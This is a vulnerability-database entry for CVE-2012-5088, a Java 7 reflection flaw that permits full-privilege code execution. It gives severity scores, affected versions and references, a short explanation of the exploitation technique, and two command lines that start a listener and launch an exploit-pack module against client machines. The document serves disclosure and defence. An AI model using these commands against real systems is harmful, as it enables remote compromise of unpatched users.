10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.927 High
EPSS
Percentile
98.8%
Name | java_CVE_2012_5088 |
---|---|
CVE | CVE-2012-5088 Exploit Pack |
VENDOR: Sun | |
Notes: | |
The exploitation technique is abusing bug patched in CVE-2012-5088 which is allowing to use reflection with full privileges. This is due to the fact that | |
we are getting an instance of java.lang.invoke.MethodHandles.Lookup by calling the static method java.lang.invoke.MethodHandles.lookup() using the | |
AverageRangeStatisticImpl class which is part of the JDK so the lookup object has a “trusted” immediate caller giving us full privileges | |
Then we make use of the AnonymousClassLoader technique to fully exploit the target. |
Affected versions
JDK and JRE 7 Update 7 and earlier
Tested on:
- Windows 7 with JDK/JRE 7 update 7
- Ubuntu 11.10 with JDK/JRE 7 update 7
- Ubuntu 11.10 with JDK/JRE 7 update 6
To run from command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17
And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_CVE_2012_5088 -O allowed_recon_modules:js_recon -O auto_detect_exploits:0
Repeatability: Infinite (client side - no crash)
References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5088
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5088
http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html
Date public: 16/10/2012